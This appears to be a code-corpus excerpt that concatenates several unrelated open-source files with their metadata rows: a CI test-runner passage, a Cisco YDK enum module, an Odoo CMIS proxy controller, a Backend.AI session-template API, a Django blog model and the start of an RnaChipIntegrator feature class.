with open('state.json', 'w') as f:
f.write(json.dumps(state, indent=4, sort_keys=True))
short_branch = job['branch'].replace('stable/', '')
now = datetime.datetime.now()
job_id = ('%04d%02d%02d-%02d%02d-%s-%s-%s'
%(now.year, now.month, now.day, now.hour, now.minute,
job['project'], short_branch, job['sha']))
job['short_branch'] = short_branch
job['job_id'] = job_id
job['timestamp'] = job['timestamp'].isoformat()
with open('job.json', 'w') as f:
f.write(json.dumps(job, indent=4, sort_keys=True))
with gzip.open('%s.log.gz' % job_id, 'w') as f:
rc = execute('sudo ./reset_osa.sh %s %s %s %s %s'
%(TARGET_VM, job['distro'], ostrich_sha, job_id,
job['project']), f)
return (rc, job_id)
def execute(command, logfile):
print('Running %s' % command)
obj = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
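    # Put the child's stdout/stderr into non-blocking mode so the select()
    # loop below can multiplex both streams without stalling.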
flags = fcntl.fcntl(obj.stdout, fcntl.F_GETFL)
fcntl.fcntl(obj.stdout, fcntl.F_SETFL, flags | os.O_NONBLOCK)
flags = fcntl.fcntl(obj.stderr, fcntl.F_GETFL)
fcntl.fcntl(obj.stderr, fcntl.F_SETFL, flags | os.O_NONBLOCK)
obj.stdin.close()
while obj.poll() is None:
readable, _, _ = select.select([obj.stderr, obj.stdout], [], [], 10)
for f in readable:
d = os.read(f.fileno(), 10000)
sys.stdout.write(d)
logfile.write(d)
logfile.flush()
print('... process complete')
returncode = obj.returncode
print('... exit code %d' % returncode)
return returncode
def main():
while True:
conn = mysql.connector.connect(**config['db'])
cursor = conn.cursor(dictionary=True, buffered=True)
cursor.execute('select * from jobs where processed=0 and '
'machine is null order by timestamp;')
if cursor.rowcount == 0:
print '%s No work, sleeping' % datetime.datetime.now()
time.sleep(60)
continue
job = cursor.fetchone()
cursor.execute('update jobs set machine=%(machine)s where '
'uuid=%(uuid)s and machine is null;',
{
'machine': socket.gethostname(),
'uuid': job['uuid']
})
if cursor.rowcount == 0:
print 'My job got stolen (id %s)!' % job['uuid']
continue
cursor.execute('commit;')
start_time = time.time()
rc, job_id = process(job)
end_time = time.time()
conn = mysql.connector.connect(**config['db'])
cursor = conn.cursor(dictionary=True, buffered=True)
cursor.execute('update jobs set processed=1, outcome=%(outcome)s, '
'log_url=%(log_url)s '
'where uuid=%(uuid)s;',
{
'outcome': rc,
'log_url': ('http://molokai.stillhq.com/lab/logs/%s/'
% job_id),
'uuid': job['uuid']
})
cursor.execute('commit;')
cursor.execute('select * from jobs where event_uuid=%(event_uuid)s;',
{'event_uuid': job['event_uuid']})
report = []
unrun = 0
for job in cursor:
outcome = ''
if str(job['outcome']) == '0':
outcome = 'passed'
elif job['outcome']:
outcome = 'failed'
else:
unrun += 1
outcome = 'not yet run'
logs = ''
if job['log_url']:
logs = ', logs at %s' % job['log_url']
report.append('%s on %s %s%s' %(job['branch'], job['distro'],
outcome, logs))
comment = 'Tests run on %s:' % job['sha']
for r in report:
comment += ('\n %s' % r)
print 'Unrun: %d' % unrun
print comment
if unrun == 0:
github_comment(job['issue_url'], comment)
#if rc != 0:
# print 'Failed test run, stopping to debug'
# sys.exit(1)
if job['type'] == 'manual':
print 'Manual job, stopping for user to operate'
sys.exit(1)
if __name__ == '__main__':
main()
|
apache-2.0
| 634,645,749,023,385,500
| 29.902703
| 80
| 0.509183
| false
| 3.783587
| false
| false
| false
|
abhikeshav/ydk-py
|
cisco-ios-xr/ydk/models/cisco_ios_xr/Cisco_IOS_XR_aaa_locald_cfg.py
|
1
|
1133
|
""" Cisco_IOS_XR_aaa_locald_cfg
This module contains a collection of YANG definitions
for Cisco IOS\-XR aaa\-locald package configuration.
This YANG module augments the
Cisco\-IOS\-XR\-aaa\-lib\-cfg
module with configuration data.
Copyright (c) 2013\-2015 by Cisco Systems, Inc.
All rights reserved.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class AaaLocaldTaskClassEnum(Enum):
"""
AaaLocaldTaskClassEnum
Aaa locald task class
.. data:: READ = 0
Permits read operation for a Task ID
.. data:: WRITE = 1
Permits write operation for a Task ID
.. data:: EXECUTE = 2
Permits execute operation for a Task ID
.. data:: DEBUG = 3
Permits debug operation for a Task ID
"""
READ = 0
WRITE = 1
EXECUTE = 2
DEBUG = 3
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_aaa_locald_cfg as meta
return meta._meta_table['AaaLocaldTaskClassEnum']
|
apache-2.0
| -94,935,661,741,093,040
| 16.166667
| 86
| 0.677846
| false
| 3.529595
| false
| false
| false
|
acsone/alfodoo
|
cmis_web_proxy/controllers/cmis.py
|
1
|
18684
|
# Copyright 2016 ACSONE SA/NV (<http://acsone.eu>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
import json
import logging
import urlparse
import werkzeug
from odoo import _, http
from odoo.http import request
from odoo.exceptions import AccessError
from odoo.addons.web.controllers import main
_logger = logging.getLogger(__name__)
try:
import requests
except ImportError:
_logger.debug('Cannot `import requests`.')
CMIS_PROXY_PATH = '/cmis/1.1/browser'
READ_ACCESS_CMIS_ACTIONS = set([
"query",
])
WRITE_ACCESS_CMIS_ACTIONS = set([
"createRelationship",
# "createPolicy", method at repository level: not supported
# "createItem", method at repository level: not supported
"bulkUpdate",
# "createType", method at repository level: not supported
# "updateType", method at repository level: not supported
"createDocument",
"createFolder",
"createDocumentFromSource",
# "createPolicy", method at repository level: not supported
"update",
"setContent",
"checkOut",
"cancelCheckOut",
"checkIn",
# "applyPolicy", method at repository level: not supported
# "applyACL", method at repository level: not supported
])
UNLINK_ACCESS_CMIS_ACTIONS = set([
"delete",
"deleteContent",
"removeObjectFromFolder",
# "removePolicy", method at repository level: not supported
# "deleteType", method at repository level: not supported
])
READ_ACCESS_ALLOWABLE_ACTIONS = set([
"canGetDescendants",
"canGetChildren",
"canGetFolderParent",
"canGetObjectParents",
"canGetProperties",
"canGetContentStream",
"canGetAllVersions",
"canGetObjectRelationships",
"canGetAppliedPolicies",
"canGetACL",
])
WRITE_ACCESS_ALLOWABLE_ACTIONS = set([
"canCreateDocument",
"canCreateFolder",
# "canCreatePolicy",
"canCreateRelationship",
"canUpdateProperties",
"canMoveObject",
"canSetContentStream",
"canAddObjectToFolder",
"canCheckOut",
"canCancelCheckOut",
"canCheckIn",
# "canApplyPolicy",
# "canApplyACL",
])
UNLINK_ACCESS_ALLOWABLE_ACTIONS = set([
"canRemoveObjectFromFolder",
"canDeleteObject",
"canDeleteContentStream",
"canDeleteTree",
# "canRemovePolicy",
])
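# Map each supported cmisaction to the Odoo ORM operation ('read', 'write'
# or 'unlink') used for the permission check.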
CMSI_ACTIONS_OPERATION_MAP = {}
for a in READ_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'read'
for a in WRITE_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'write'
for a in UNLINK_ACCESS_CMIS_ACTIONS:
CMSI_ACTIONS_OPERATION_MAP[a] = 'unlink'
def gen_dict_extract(key, var):
""" This method is used to recusrively find into a json structure (dict)
all values of a given key
credits: http://stackoverflow.com/questions/9807634/
find-all-occurences-of-a-key-in-nested-python-dictionaries-and-lists
"""
if hasattr(var, 'items'):
for k, v in var.items():
if k == key:
yield v
if isinstance(v, dict):
for result in gen_dict_extract(key, v):
yield result
elif isinstance(v, list):
for d in v:
for result in gen_dict_extract(key, d):
yield result
class CmisProxy(http.Controller):
@property
def _cmis_proxy_base_url(self):
return urlparse.urljoin(request.httprequest.host_url, CMIS_PROXY_PATH)
@classmethod
def _clean_url_in_dict(cls, values, original, new):
"""Replace all occurences of the CMIS container url in the json
returned by a call to the CMIS container by the one of the proxy"""
if original.endswith('/'):
original = original[:-1]
for k, v in values.items():
if isinstance(v, dict):
cls._clean_url_in_dict(v, original, new)
elif hasattr(v, 'replace'):
values[k] = v.replace(original, new)
def _check_access_operation(self, model_inst, operation):
"""
Check if the user has the appropriate rights to perform the operation.
The default is to check the access rights and access rules on the
model instance. This behaviour can be adapted by defining the method
''_check_cmis_access_operation'' on the model.
::
@api.multi
def _check_cmis_access_operation(self, operation, field_name=None):
if my_true_condition:
return 'allow'
if my_false_condition:
return 'deny'
return 'default'
The expected result must be in ('allow', 'deny', 'default').
* allow: Access granted
* deny: Access Denied
* default: The current method will check the access rights and access
rules
"""
try:
if hasattr(model_inst, '_check_cmis_access_operation'):
res = model_inst._check_cmis_access_operation(operation, None)
if res not in ('allow', 'deny', 'default'):
raise ValueError("_check_cmis_access_operation result "
"must be in ('allow', 'deny', 'default')")
if res != 'default':
return res == 'allow'
model_inst.check_access_rights(operation)
model_inst.check_access_rule(operation)
except AccessError:
return False
return True
def _apply_permissions_mapping(self, value, headers, proxy_info,
model_inst=None):
"""This method modify the defined allowableActions returned by the
CMIS container to apply the Odoo operation policy defined of the
model instance
"""
if not model_inst:
return
all_allowable_actions = [aa for aa in gen_dict_extract(
'allowableActions', value)]
if not all_allowable_actions:
return
can_read = self._check_access_operation(model_inst, 'read')
can_write = self._check_access_operation(model_inst, 'write')
can_unlink = self._check_access_operation(model_inst, 'unlink')
for allowable_actions in all_allowable_actions:
for action, val in allowable_actions.items():
allowed = False
if action in READ_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_read and val
elif action in WRITE_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_write and val
elif action in UNLINK_ACCESS_ALLOWABLE_ACTIONS:
allowed = can_unlink and val
allowable_actions[action] = allowed
def _sanitize_headers(self, headers):
for key in headers:
if key.lower() == 'transfer-encoding':
headers[key] = None
def _prepare_json_response(self, value, headers, proxy_info,
model_inst=None):
cmis_location = proxy_info['location']
self._clean_url_in_dict(value,
urlparse.urlparse(cmis_location).geturl(),
proxy_info['proxy_location'])
if proxy_info['apply_odoo_security']:
self._apply_permissions_mapping(
value, headers, proxy_info, model_inst)
self._sanitize_headers(headers)
response = werkzeug.Response(
json.dumps(value), mimetype='application/json',
headers=headers)
return response
@classmethod
def _get_redirect_url(cls, proxy_info, url_path):
cmis_location = proxy_info['location']
return urlparse.urljoin(cmis_location, url_path)
def _forward_get_file(self, url, proxy_info, params):
"""Method called to retrieved the content associated to a CMIS object.
The content is streamed between the CMIS container and the caller to
avoid to suck the server memory
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
r = requests.get(
url, params=params,
stream=True,
auth=(proxy_info['username'], proxy_info['password']))
r.raise_for_status()
headers = dict(r.headers.items())
self._sanitize_headers(headers)
return werkzeug.Response(
r, headers=headers,
direct_passthrough=True)
def _forward_get(self, url_path, proxy_info, model_inst, params):
"""
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
url = self._get_redirect_url(proxy_info, url_path)
if params.get('cmisselector') == 'content':
return self._forward_get_file(url, proxy_info, params)
r = requests.get(
url, params=params,
auth=(proxy_info['username'], proxy_info['password']))
r.raise_for_status()
if r.text:
return self._prepare_json_response(
r.json(), dict(r.headers.items()), proxy_info, model_inst)
else:
response = werkzeug.Response()
return response
def _forward_post(self, url_path, proxy_info, model_inst, params):
"""The CMIS Browser binding is designed to be queried from the browser
Therefore, the parameters in a POST are expected to be submitted as
HTTP multipart forms. Therefore each parameter in the request is
forwarded as a part of a multipart/form-data.
:return: :class:`Response <Response>` object
:rtype: werkzeug.Response
"""
files = {}
if 'content' in params:
# we are in a mulitpart form data'
content = params.pop('content')
files['content'] = (
content.filename,
content.stream,
content.mimetype
)
for k, v in params.items():
# no filename for parts dedicated to HTTP Form data
files[k] = (None, v, 'text/plain;charset=utf-8')
url = self._get_redirect_url(proxy_info, url_path)
r = requests.post(url, files=files,
auth=(
proxy_info['username'], proxy_info['password']))
r.raise_for_status()
if r.text:
return self._prepare_json_response(
r.json(), dict(r.headers.items()), proxy_info, model_inst)
else:
response = werkzeug.Response()
return response
def _check_provided_token(self, cmis_path, proxy_info, params):
""" Check that a token is present in the request or in the http
headers and both are equal.
:return: the token value if checks are OK, False otherwise.
"""
token = request.httprequest.headers.get('Authorization')
if token:
token = token.replace('Bearer', '').strip()
else:
token = (params.get('token') or '').strip()
if 'token' in params:
params.pop('token')
if not token:
_logger.info("Tokens not provided in headers or request params")
return False
return token
def _decode_token(self, cmis_path, proxy_info, params,
token):
"""Return the Odoo object referenced by the token and the field name
for which the query is done
:return: a tuple (Odoo model instance if exists and user has at least
read access or False, field_name)
"""
token = json.loads(token)
model_name = token.get('model')
false_result = False, False
res_id = token.get('res_id')
if model_name not in request.env:
_logger.info("Invalid model name in token (%s)", model_name)
return false_result
model = request.env[model_name]
if not model.check_access_rights('read', raise_exception=False):
_logger.info("User has no read access on model %s", model_name)
return false_result
model_inst = model.browse(res_id)
if not model_inst.exists():
_logger.info("The referenced model doesn't exist or the user has "
"no read access (%s, %s)", model, res_id)
return false_result
return model_inst, token.get('field_name')
def _check_cmis_content_access(self, cmis_path, proxy_info, params,
model_inst, field_name):
"""Check that the CMIS content referenced into the request is the
same as or a child of the one linked to the odoo model instance.
:return: True if check is Ok False otherwise
"""
token_cmis_objectid = getattr(model_inst, field_name)
if not token_cmis_objectid:
_logger.info("The referenced model doesn't reference a CMIS "
"content (%s, %s)", model_inst._name, model_inst.id)
return False
request_cmis_objectid = params.get('renderedObjectId')
if request_cmis_objectid:
# If the proxy is called to render a cmis content, we need to check
# the original objectId since the one provided by the rendition
# service has no paths
params.pop('renderedObjectId')
else:
request_cmis_objectid = params.get('objectId')
repo = proxy_info['cmis_repository']
if not request_cmis_objectid:
# get the CMIS object id from cmis_path
cmis_content = repo.getObjectByPath(cmis_path)
request_cmis_objectid = cmis_content.getObjectId()
if request_cmis_objectid == token_cmis_objectid:
# the operation is on the CMIS content linked to the Odoo model
# instance
return True
cmis_object = repo.getObject(request_cmis_objectid)
# We can't use a CMIS query to check if a node is in the expected
# tree since the indexation is asynchronous. In place of a simple
# query we check if one of the paths of the node linked to the Odoo
# content instance is in one of the node paths of the requested
# cmis_object
child_paths = cmis_object.getPaths()
parent_paths = repo.getObject(token_cmis_objectid).getPaths()
for p in parent_paths:
for cp in child_paths:
if p in cp:
return True
_logger.info("%s is not a child of %s", request_cmis_objectid,
token_cmis_objectid)
return False
def _check_content_action_access(self, cmis_path, proxy_info, params,
model_inst):
"""Check that the User has de required Permissioon on the Odoo model
instance to di the expected CMIS action
"""
cmisaction = params.get('cmisaction')
if not cmisaction:
return True
operation = CMSI_ACTIONS_OPERATION_MAP.get(cmisaction)
if not operation:
_logger.info("CMIS action %s not supported", cmisaction)
return False
if not self._check_access_operation(model_inst, operation):
_logger.info("User don't have the access right for operation %s "
"on %s to execute the CMIS action %s", operation,
model_inst.name_get()[0][1], cmisaction)
return False
return True
def _check_access(self, cmis_path, proxy_info, params):
"""This method check that the user can access to the requested CMIS
content.
Security checks applied when the proxy mode is activated,:
1. Requests from the client must provide a token (in the header or
as param of the request).
If no security token is provided in this case, the access is denied.
2. The Odoo object referenced by the token (the token is build as
'model.name' + '_' + 'instance_id') must exist.
3. The user must have read access to the object referenced by the token
4. If a cmis_path or object_id is provided by the request, the
referenced CMIS content must be child of or the node referenced by
the Odoo object from the token (or equal)
5. If a cmisaction is provided by the request, a check is done to
ensure that the user has the required privileges in Odoo
"""
# check token conformity
token = self._check_provided_token(cmis_path, proxy_info, params)
if not token:
raise AccessError(_("Bad request"))
# check access to object from token
model_inst, field_name = self._decode_token(
cmis_path, proxy_info, params, token)
if not model_inst:
raise AccessError(_("Bad request"))
# check if the CMIS object in the request is the the one referenced on
# model_inst or a child of this one
if not cmis_path and 'objectId' not in params:
# The request is not for an identified content
return model_inst
if not self._check_cmis_content_access(
cmis_path, proxy_info, params, model_inst, field_name):
raise AccessError(_("Bad request"))
if not self._check_content_action_access(
cmis_path, proxy_info, params, model_inst):
raise AccessError(_("Bad request"))
return model_inst
@http.route([
CMIS_PROXY_PATH + '/<int:backend_id>',
CMIS_PROXY_PATH + '/<int:backend_id>/<path:cmis_path>'
], type='http', auth="user", csrf=False, methods=['GET', 'POST'])
@main.serialize_exception
def call_cmis_services(self, backend_id, cmis_path="", **kwargs):
"""Call at the root of the CMIS repository. These calls are for
requesting the global services provided by the CMIS Container
"""
        # proxy_info is information available from the cache without loading
        # the cmis.backend from the database
proxy_info = request.env['cmis.backend'].get_proxy_info_by_id(
backend_id)
method = request.httprequest.method
model_inst = False
if proxy_info.get('apply_odoo_security'):
model_inst = self._check_access(cmis_path, proxy_info, kwargs)
if method not in ['GET', 'POST']:
raise AccessError(
_("The HTTP METHOD %s is not supported by CMIS") % method)
if method == 'GET':
method = self._forward_get
elif method == 'POST':
method = self._forward_post
return method(cmis_path, proxy_info, model_inst, kwargs)
|
agpl-3.0
| 6,017,278,269,581,853,000
| 39.267241
| 79
| 0.596286
| false
| 4.189238
| false
| false
| false
|
lablup/backend.ai-manager
|
src/ai/backend/manager/api/session_template.py
|
1
|
14992
|
import json
import logging
from typing import (
Any,
List,
Mapping,
TYPE_CHECKING,
Tuple,
)
import uuid
from aiohttp import web
import aiohttp_cors
import sqlalchemy as sa
import trafaret as t
import yaml
from ai.backend.common import validators as tx
from ai.backend.common.logging import BraceStyleAdapter
from ..models import (
association_groups_users as agus, domains,
groups, session_templates, keypairs, users, UserRole,
query_accessible_session_templates, TemplateType,
)
from ..models.session_template import check_task_template
from .auth import auth_required
from .exceptions import InvalidAPIParameters, TaskTemplateNotFound
from .manager import READ_ALLOWED, server_status_required
from .types import CORSOptions, Iterable, WebMiddleware
from .utils import check_api_params, get_access_key_scopes
if TYPE_CHECKING:
from .context import RootContext
log = BraceStyleAdapter(logging.getLogger(__name__))
@server_status_required(READ_ALLOWED)
@auth_required
@check_api_params(t.Dict(
{
tx.AliasedKey(['group', 'groupName', 'group_name'], default='default'): t.String,
tx.AliasedKey(['domain', 'domainName', 'domain_name'], default='default'): t.String,
t.Key('owner_access_key', default=None): t.Null | t.String,
t.Key('payload'): t.String
}
))
async def create(request: web.Request, params: Any) -> web.Response:
if params['domain'] is None:
params['domain'] = request['user']['domain_name']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
requester_uuid = request['user']['uuid']
log.info(
'SESSION_TEMPLATE.CREATE (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
user_uuid = request['user']['uuid']
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
if requester_access_key != owner_access_key:
# Admin or superadmin is creating sessions for another user.
            # The check for admin privileges is already done in get_access_key_scopes().
query = (
sa.select([keypairs.c.user, users.c.role, users.c.domain_name])
.select_from(sa.join(keypairs, users, keypairs.c.user == users.c.uuid))
.where(keypairs.c.access_key == owner_access_key)
)
result = await conn.execute(query)
row = result.first()
owner_domain = row['domain_name']
owner_uuid = row['user']
owner_role = row['role']
else:
# Normal case when the user is creating her/his own session.
owner_domain = request['user']['domain_name']
owner_uuid = requester_uuid
owner_role = UserRole.USER
query = (
sa.select([domains.c.name])
.select_from(domains)
.where(
(domains.c.name == owner_domain) &
(domains.c.is_active)
)
)
qresult = await conn.execute(query)
domain_name = qresult.scalar()
if domain_name is None:
raise InvalidAPIParameters('Invalid domain')
if owner_role == UserRole.SUPERADMIN:
# superadmin can spawn container in any designated domain/group.
query = (
sa.select([groups.c.id])
.select_from(groups)
.where(
(groups.c.domain_name == params['domain']) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
elif owner_role == UserRole.ADMIN:
# domain-admin can spawn container in any group in the same domain.
if params['domain'] != owner_domain:
raise InvalidAPIParameters("You can only set the domain to the owner's domain.")
query = (
sa.select([groups.c.id])
.select_from(groups)
.where(
(groups.c.domain_name == owner_domain) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
else:
# normal users can spawn containers in their group and domain.
if params['domain'] != owner_domain:
raise InvalidAPIParameters("You can only set the domain to your domain.")
query = (
sa.select([agus.c.group_id])
.select_from(agus.join(groups, agus.c.group_id == groups.c.id))
.where(
(agus.c.user_id == owner_uuid) &
(groups.c.domain_name == owner_domain) &
(groups.c.name == params['group']) &
(groups.c.is_active)
)
)
qresult = await conn.execute(query)
group_id = qresult.scalar()
if group_id is None:
raise InvalidAPIParameters('Invalid group')
log.debug('Params: {0}', params)
try:
body = json.loads(params['payload'])
except json.JSONDecodeError:
try:
body = yaml.safe_load(params['payload'])
except (yaml.YAMLError, yaml.MarkedYAMLError):
raise InvalidAPIParameters('Malformed payload')
template_data = check_task_template(body)
template_id = uuid.uuid4().hex
resp = {
'id': template_id,
'user': user_uuid.hex,
}
query = session_templates.insert().values({
'id': template_id,
'domain_name': params['domain'],
'group_id': group_id,
'user_uuid': user_uuid,
'name': template_data['metadata']['name'],
'template': template_data,
'type': TemplateType.TASK,
})
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response(resp)
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('all', default=False): t.ToBool,
tx.AliasedKey(['group_id', 'groupId'], default=None): tx.UUID | t.String | t.Null,
}),
)
async def list_template(request: web.Request, params: Any) -> web.Response:
resp = []
access_key = request['keypair']['access_key']
domain_name = request['user']['domain_name']
user_role = request['user']['role']
user_uuid = request['user']['uuid']
log.info('SESSION_TEMPLATE.LIST (ak:{})', access_key)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
entries: List[Mapping[str, Any]]
if request['is_superadmin'] and params['all']:
j = (
session_templates
.join(users, session_templates.c.user_uuid == users.c.uuid, isouter=True)
.join(groups, session_templates.c.group_id == groups.c.id, isouter=True)
)
query = (
sa.select([session_templates, users.c.email, groups.c.name], use_labels=True)
.select_from(j)
.where(
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.execute(query)
entries = []
for row in result:
                is_owner = row.session_templates_user_uuid == user_uuid
entries.append({
'name': row.session_templates_name,
'id': row.session_templates_id,
'created_at': row.session_templates_created_at,
'is_owner': is_owner,
'user': (str(row.session_templates_user_uuid)
if row.session_templates_user_uuid else None),
'group': (str(row.session_templates_group_id)
if row.session_templates_group_id else None),
'user_email': row.users_email,
'group_name': row.groups_name,
})
else:
extra_conds = None
if params['group_id'] is not None:
extra_conds = ((session_templates.c.group_id == params['group_id']))
entries = await query_accessible_session_templates(
conn,
user_uuid,
TemplateType.TASK,
user_role=user_role,
domain_name=domain_name,
allowed_types=['user', 'group'],
extra_conds=extra_conds,
)
for entry in entries:
resp.append({
'name': entry['name'],
'id': entry['id'].hex,
'created_at': str(entry['created_at']),
'is_owner': entry['is_owner'],
'user': str(entry['user']),
'group': str(entry['group']),
'user_email': entry['user_email'],
'group_name': entry['group_name'],
'type': 'user' if entry['user'] is not None else 'group',
})
return web.json_response(resp)
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('format', default='yaml'): t.Null | t.Enum('yaml', 'json'),
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def get(request: web.Request, params: Any) -> web.Response:
if params['format'] not in ['yaml', 'json']:
raise InvalidAPIParameters('format should be "yaml" or "json"')
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.GET (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
template_id = request.match_info['template_id']
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.template])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
template = await conn.scalar(query)
if not template:
raise TaskTemplateNotFound
template = json.loads(template)
if params['format'] == 'yaml':
body = yaml.dump(template)
return web.Response(text=body, content_type='text/yaml')
else:
return web.json_response(template)
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('payload'): t.String,
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def put(request: web.Request, params: Any) -> web.Response:
template_id = request.match_info['template_id']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.PUT (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*',
)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.id])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.scalar(query)
if not result:
raise TaskTemplateNotFound
        try:
            body = json.loads(params['payload'])
        except json.JSONDecodeError:
            try:
                body = yaml.safe_load(params['payload'])
            except (yaml.YAMLError, yaml.MarkedYAMLError):
                raise InvalidAPIParameters('Malformed payload')
template_data = check_task_template(body)
query = (
sa.update(session_templates)
.values(template=template_data, name=template_data['metadata']['name'])
.where((session_templates.c.id == template_id))
)
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response({'success': True})
@auth_required
@server_status_required(READ_ALLOWED)
@check_api_params(
t.Dict({
t.Key('owner_access_key', default=None): t.Null | t.String,
})
)
async def delete(request: web.Request, params: Any) -> web.Response:
template_id = request.match_info['template_id']
requester_access_key, owner_access_key = await get_access_key_scopes(request, params)
log.info(
'SESSION_TEMPLATE.DELETE (ak:{0}/{1})',
requester_access_key,
owner_access_key if owner_access_key != requester_access_key else '*'
)
root_ctx: RootContext = request.app['_root.context']
async with root_ctx.db.begin() as conn:
query = (
sa.select([session_templates.c.id])
.select_from(session_templates)
.where(
(session_templates.c.id == template_id) &
(session_templates.c.is_active) &
(session_templates.c.type == TemplateType.TASK)
)
)
result = await conn.scalar(query)
if not result:
raise TaskTemplateNotFound
query = (
sa.update(session_templates)
.values(is_active=False)
.where((session_templates.c.id == template_id))
)
result = await conn.execute(query)
assert result.rowcount == 1
return web.json_response({'success': True})
async def init(app: web.Application) -> None:
pass
async def shutdown(app: web.Application) -> None:
pass
def create_app(default_cors_options: CORSOptions) -> Tuple[web.Application, Iterable[WebMiddleware]]:
app = web.Application()
app.on_startup.append(init)
app.on_shutdown.append(shutdown)
app['api_versions'] = (4, 5)
app['prefix'] = 'template/session'
cors = aiohttp_cors.setup(app, defaults=default_cors_options)
cors.add(app.router.add_route('POST', '', create))
cors.add(app.router.add_route('GET', '', list_template))
template_resource = cors.add(app.router.add_resource(r'/{template_id}'))
cors.add(template_resource.add_route('GET', get))
cors.add(template_resource.add_route('PUT', put))
cors.add(template_resource.add_route('DELETE', delete))
return app, []
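# Route summary for this sub-application (derived from create_app above;
# the final mount point depends on how the root application handles
# app['prefix']):
#   POST   template/session                 -> create
#   GET    template/session                 -> list_template
#   GET    template/session/{template_id}   -> get
#   PUT    template/session/{template_id}   -> put
#   DELETE template/session/{template_id}   -> delete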
|
lgpl-3.0
| -2,623,418,009,516,440,000
| 36.668342
| 101
| 0.566169
| false
| 3.926663
| false
| false
| false
|
domain51/d51.django.apps.blogs
|
d51/django/apps/blogs/models.py
|
1
|
1309
|
from django.db import models
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
class RichTextField(models.TextField):
pass
class Post(models.Model):
internal_title = models.CharField(max_length=255)
display_title = models.CharField(null=True, blank=True, max_length=255)
summary = RichTextField()
content = RichTextField()
meta_keywords = models.CharField(null=True, blank=True, max_length=255)
slug = models.SlugField(unique=True)
author = models.ForeignKey(User, blank=True, null=True)
published = models.DateTimeField()
add_date = models.DateTimeField(auto_now_add=True)
modified_date = models.DateTimeField(auto_now=True)
link = models.CharField(blank=True, null=True, max_length=200)
@property
def title(self):
return self.display_title or self.internal_title
def get_absolute_url(self):
return reverse('post-detail', kwargs={
'year':self.published.year,
'month':self.published.strftime('%b'),
'day':self.published.day,
'slug':self.slug,
})
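    # A urlconf entry the reverse() call above could resolve against might
    # look like this (illustrative only; the actual URL pattern lives
    # outside this file):
    #   url(r'^(?P<year>\d{4})/(?P<month>\w{3})/(?P<day>\d{1,2})/(?P<slug>[-\w]+)/$',
    #       'post_detail_view', name='post-detail')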
def __unicode__(self):
return self.title
class Meta:
ordering = ['-published',]
verbose_name = 'blog post'
verbose_name_plural = 'blog posts'
|
gpl-3.0
| -3,552,080,607,034,685,400
| 29.44186
| 75
| 0.663866
| false
| 3.895833
| false
| false
| false
|
fls-bioinformatics-core/RnaChipIntegrator
|
rnachipintegrator/Features.py
|
1
|
19026
|
#!/bin/env python
#
# Features.py: classes for handling feature data
# Copyright (C) University of Manchester 2011-2019 Peter Briggs, Leo Zeef
# & Ian Donaldson
#
"""
Features.py
Classes for handling feature data.
"""
import logging
import io
from .distances import closestDistanceToRegion
from .utils import make_errline
class FeatureSet(object):
"""Class for storing a set of features
    RNA-seq features consist of genes/transcripts/isomers, which
    are stored individually in Feature objects. This class is a
    container for a collection of Feature objects and provides
    methods to operate on the collection: creating subsets by
    filtering, and sorting the features based on various criteria.
"""
def __init__(self,features_file=None,features_list=None):
"""Create a new FeatureSet instance
Raises an exception if there are errors in the input file data
(non-numeric fields for start/end positions, end positions
occurring before start positions, or illegal strand values).
Arguments:
features_file (str): (optional) the name of an input
file to read the feature data from
features_list (list): (optional) list of Feature objects
to populate the FeatureSet with
"""
self.features = []
self.source_file = None
if features_file:
self.loadFeaturesFromFile(features_file)
elif features_list:
for feature in features_list:
self.addFeature(feature)
def loadFeaturesFromFile(self,features_file):
"""Read features from a file and populate the object
Arguments:
features_file: the name of the input file to read features from.
"""
# Local flags etc
line_index = 0
critical_error = False
# Read in data from file
with io.open(features_file,'rt') as fp:
for line in fp:
# Increment index
